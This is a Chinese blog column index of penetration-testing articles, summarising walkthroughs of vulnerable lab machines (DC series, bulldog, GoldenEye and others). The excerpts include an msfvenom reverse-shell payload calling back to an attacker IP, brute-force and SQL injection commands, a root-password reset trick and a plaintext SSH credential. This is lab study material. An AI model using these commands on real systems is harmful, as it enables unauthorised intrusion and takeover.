渗透测试
文章平均质量分 78
malloc_冲!
这比赛也太难打了叭……
展开
-
【渗透测试】Lin.Security靶机渗透练习_虚拟机无法获取ip的配置方法+靶机多种提权方式练习
靶机描述:在in.security,我们希望开发一个Linux虚拟机,该虚拟机在编写本文时基于最新的Ubuntu发行版(18.04 LTS),但存在许多漏洞,这些漏洞使用户无法升级扎根在盒子上。旨在帮助理解某些内置应用程序和服务(如果配置错误)可能会被攻击者滥用。首先,您可以使用以下凭据登录主机:bob / secret下载地址:https://in.security/downloads/lin.security_v1.0.ova环境配置:1.因为直接开机的security靶机NAT连接,无法原创 2021-09-06 23:14:04 · 1570 阅读 · 0 评论 -
【渗透测试】SolidState靶机渗透练习_rbash逃逸+4555端口james服务漏洞
一、信息收集:arp-scan -lnmap -sS -sV -T5 -p- 192.168.225.190dirb http://192.168.225.190 //无有效目录2.根据端口扫描信息,可以看到开放了邮件接收pop3服务,4555端口开放的是james-admin服务,进行远程查看:telnet 192.168.225.190 4555 //使用root root密码进行登录help //查看指令listusers //列用户名setpassword mindy原创 2021-09-03 14:32:33 · 780 阅读 · 0 评论 -
【渗透测试】ew代理三层靶机穿透+proxifier配置规则
1.远程连接:ssh yansiyu@10.177.228.176W6WEwrqD2.msf生成木马:cd /usr/share/metasploit-framework./msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.177.228.128 LPORT=1234 -f elf > /home/load.elf3.上传木马payload.elf文件到一层靶机:scp -p load.elf yansiyu@原创 2021-09-02 23:09:12 · 2826 阅读 · 0 评论 -
【渗透测试】phpmyadmin一句话写入+socks代理渗透内网+CVE-2021-3493漏洞利用
OFF表示日志关闭C:\phpStudy\MySQL\data\stu1.log为日志绝对路径原创 2021-09-02 14:59:15 · 954 阅读 · 0 评论 -
【靶机渗透】Mr-Robot靶机渗透练习_nmap提权
1.信息收集三部曲:扫描ip+端口扫描+目录扫描:原创 2021-09-01 10:58:33 · 519 阅读 · 2 评论 -
【靶机渗透】bulldog-2靶机渗透练习_js文件分析+越权漏洞
靶机ip无法获取问题的解决方法:用网上的方法使用dirty pass根本无法登录,接下来记录一下我的处理办法,很暴力,直接修改靶机密码……1.在启动界面按E2.找到ro_quiet splash这一行将其改为rw quiet splash init=/bin/bash3.按ctrl+x保存重启4.输入passwd root,接住连续输入两次要更改的root密码5.重启,用root账户登录,输入dhclient配置ip6.输入ifconfig -a即可查询到分配的ip,此时也就可.原创 2021-08-31 23:57:29 · 879 阅读 · 2 评论 -
【靶机渗透】bulldog靶机渗透练习_strings命令使用+反弹shell方法
靶机ip无法获取问题的解决方法:1.重启bulldog,到开机页面选择第二个Ubuntu的高级选项。2.进入高级选项,再次选择第二个Linux内核版本的恢复模式回车。3.选择root一行回车,进入命令行模式4.输入 mount -o rw,remount /5.输入 ifconfig -a (查看网卡名称)6.输入 vim /etc/network/interfaces ,修改网卡名称成查询的结果,保存后输入reboot重启即可。auto ens33iface ens33 i原创 2021-08-31 11:26:52 · 771 阅读 · 0 评论 -
【靶机渗透】Escalate_Linux靶机渗透练习+12种提权方式
注:这个靶机主要用来练习Linux提权,有超过12种的提权方法1.主机发现:arp-scan -l,发现靶机ip为192.168.225.149,并进行访问2.扫描端口,开启了80,22端口nmap -n -p- -A 192.168.225.149 -o escalate.nmap3.发现是默认的apache页面,那么爆破php后缀的路径,发现shell.php的页面,进行访问:dirb http://192.168.225.149 -X .php4.提示:原创 2021-08-31 09:06:48 · 4436 阅读 · 8 评论 -
【DC系列】DC-5靶机渗透练习
1.主机发现:sudo arp-scan -l,发现靶机ip为192.168.225.1452.扫描端口,发现开启了三个端口:nmap 192.168.225.145 -sV -sC -Pn -n -v -T5 -p-3.访问页面,发现contact页面在提交留言后,出现改变,年份刷新一次改变一次,与提示相符,直接去访问thankyou.php也是一样的:4.扫描目录:发现存在index.php,solutions.php,about-us.php,faq.php,contac原创 2021-08-31 00:40:25 · 425 阅读 · 0 评论 -
【靶机渗透】SkyTower渗透练习_proxytunnel设置代理服务器隧道+.bashrc文件概念
SkyTower靶机:1.主机发现:arp-scan -l,发现靶机ip为192.168.225.1682.nmap扫描端,口扫描到22和80端口,访问80端口:nmap 192.168.225.168 -sV -sC -Pn -n -v -T5 -p-但是注意:这里的22端口被过滤了,百度查询squid发现这个是用来设置代理的3.现在访问一下网站,看到登录框,测试发现存在注入漏洞:4.因为过滤了and,将其替换为||123' || 1=1#...原创 2021-08-31 00:36:06 · 580 阅读 · 0 评论 -
【DC系列】DC-8靶机渗透练习
DC-8靶机:1.主机发现:arp-scan -l,发现靶机ip为192.168.225.1522.nmap扫描端口:nmap 192.168.225.152 -sV -sC -Pn -n -v -T5 -p-扫描到22和80端口,访问80端口3.访问一下,看到drupal框架,点击任意链接,发现类似注入点的地方,测试发现是数字型注入4.sqlmap可以流程化的跑一跑:python sqlmap.py -u "http://192.168.225.152/?nid=..原创 2021-08-31 00:29:17 · 423 阅读 · 0 评论 -
【DC系列】DC-7靶机渗透练习
DC-7:1.主机发现:sudo arp-scan -l,发现靶机ip为172.20.10.132.扫描端口,开启了远程连接的22端口和80端口nmap 172.20.10.13 -sV -sC -Pn -n -v -T5 -p-3.访问80端口发现是drupal,但是下方有一个@DC7USER,百度一下发现,有github的项目:点击查看staffdb的内容,发现有一个配置文件config.php:查看配置文件发现了账号密码:4.用搜索到的账号密码进行ss原创 2021-08-31 00:30:30 · 238 阅读 · 0 评论 -
【DC系列】DC-6靶机渗透测试_csrf漏洞+nmap提权
1.主机发现:sudo arp-scan -l,发现靶机ip为192.168.225.1442.扫描端口,开启了80和22端口nmap 192.168.225.144 -sV -sC -Pn -n -v -T5 -p-3.访问页面,发现页面被重定向到页面跳转到了http://wordy,跟前面的DC-2一样,在\etc\hosts文件中增加wordy,保存后重新访问4.使用dirsearch扫到后台登录路径wp-admin和readme.txt文件,获得了版本4.7:p原创 2021-08-31 00:21:45 · 6009 阅读 · 1 评论 -
【DC系列】DC-4靶机渗透练习
1.主机发现:sudo arp-scan -l,发现靶机ip为192.168.225.143 2.扫描端口,开启了80端口nmap 192.168.225.143 -sV -sC -Pn -n -v -T5 -p-3.提示使用admin账户登录,所以仅需要爆破密码:4.用kali自带的rockyou字典进行hydra爆破,第一次使用需要解压:gzip -d rockyou.txt.gz5.hydra命令爆破:(不会写命令可以将字典复制出来,在burp中爆破)原创 2021-08-30 19:18:25 · 300 阅读 · 0 评论 -
【DC系列】DC-3靶机渗透练习
1.主机发现:sudo arp-scan -l,发现靶机ip为192.168.225.1422.扫描端口,开启了80端口,Joomla框架nmap 192.168.225.142 -sV -sC -Pn -n -v -T5 -p-使用dirsearch扫到后台路径和README.txt文件,获得了版本:python dirsearch.py -u http://192.168.225.142/ -e * -i 2003.发现版本号为3.7,百度查出有一个注入漏洞:原创 2021-08-30 19:14:39 · 245 阅读 · 1 评论 -
【DC系列】DC-2靶机渗透练习
DC-2:1.主机发现:sudo arp-scan -l,发现靶机ip为192.168.101.112.扫描端口,发现开放了80和7744端口:nmap 192.168.101.11 -p 1-655353.但是访问地址发现被重定向到dc-2/,修改hosts文件,添加靶机的IP:vi /etc/hosts4.修改后可以访问网址发现是wordpress平台,点击进入flag注:WordPress是一种使用PHP语言开发的博客平台,用户可以在支持PHP和MySQ原创 2021-08-30 19:11:12 · 331 阅读 · 0 评论 -
【DC系列】DC-1靶机渗透练习
DC-1靶机:1.主机发现:sudo arp-scan -l,发现靶机ip为192.168.1.112.nmap扫描端口:(NAT扫不到,改桥接了)nmap 192.168.225.132 -sV -sC -Pn -n -v -T5 -p-扫描到22和80端口,访问80端口3.访问一下,看到drupal,这都是某种cms思路就是搜cms都有哪些利用程序,搜索可利用的漏洞:searchsploit Drupal 74.看到有很多现成的的利用程序,有远程的命令执行,在me原创 2021-08-30 19:08:03 · 372 阅读 · 0 评论 -
【靶机渗透】GoldenEye靶机渗透练习
1.主机发现:arp-scan -l,发现靶机ip为192.168.225.1532.扫描端口,开启了55007端口为pop3服务nmap 192.168.225.153 -sV -sC -Pn -n -v -T5 -p-3.访问网址,查看源代码,发现terminal.js,进行访问发现两个用户名:boris和Natalya进行unicode解码,获得密码:InvincibleHack3r4.尝试登录:http://192.168.225.153/sev-home/5..原创 2021-08-30 19:02:58 · 705 阅读 · 0 评论 -
【靶机渗透】入门级Toppo靶机渗透练习
1.主机发现:arp-scan -l,发现靶机ip为192.168.225.148,并进行访问2.扫描端口,开启了80,22端口nmap 192.168.225.148 -sV -sC -Pn -n -v -T5 -p-3.扫目录发现admin的页面,进行访问:dirb http://192.168.225.1483.发现note.txt,根据提示:他不懂技术,不会改密码,所以猜测靶机密码为:12345ted1234.尝试远程登录一下:ssh 19原创 2021-08-30 18:53:15 · 474 阅读 · 2 评论 -
【靶机渗透】w1r3s.v1.0.1靶机渗透练习
靶机描述:您受雇在W1R3S.inc个人服务器上进行渗透测试并报告所有结果。他们要求您获得root访问权限并找到标志(位于/root目录中)1.主机发现:arp-scan -l,发现靶机ip为192.168.225.1422.扫描端口nmap 192.168.225.142 -sV -sC -Pn -n -v -T5 -p-3.使用gobuster扫到后台路径:gobuster dir -u http://192.168.225.154/ -w /usr/share/wordl.原创 2021-08-30 18:50:55 · 624 阅读 · 0 评论 -
【靶机渗透】LAMPIAO靶机渗透练习
LAMPIAO训练靶机1.arp-scan -l扫描到IP地址为:192.168.225.140使用nmap扫描到开启了22和80端口以及1898端口:nmap 192.168.225.140 -sV -sC -Pn -n -v -T5 -p- 2.访问1898端口,发现网页下面的标志:Powered by Drupal1)进行dirsearch扫描,在目录中发现了robots.txt文件查看该文件,查看CHANGELOG.txt文件,发现网站的版本信息7.54,看到cms的版原创 2021-08-30 18:48:22 · 707 阅读 · 0 评论 -
【靶机渗透】eric靶机通关练习
1.扫描存活主机ip:sudo arp-scan -lnetdiscover -r 192.168.225.133 -i eth02.探测开放端口:nmap 192.168.225.138 -sV -sC -Pn -n -v -T5 -p-看到开放了80和22端口,同时扫描到他的git源码泄露首先,先访问一下80端口,发现没有什么信息量3.扫目录,扫出admin.php(访问发现是个登录界面),upload(说明可以上传),robots.txt(应该有信息)3.原创 2021-08-30 18:45:55 · 473 阅读 · 0 评论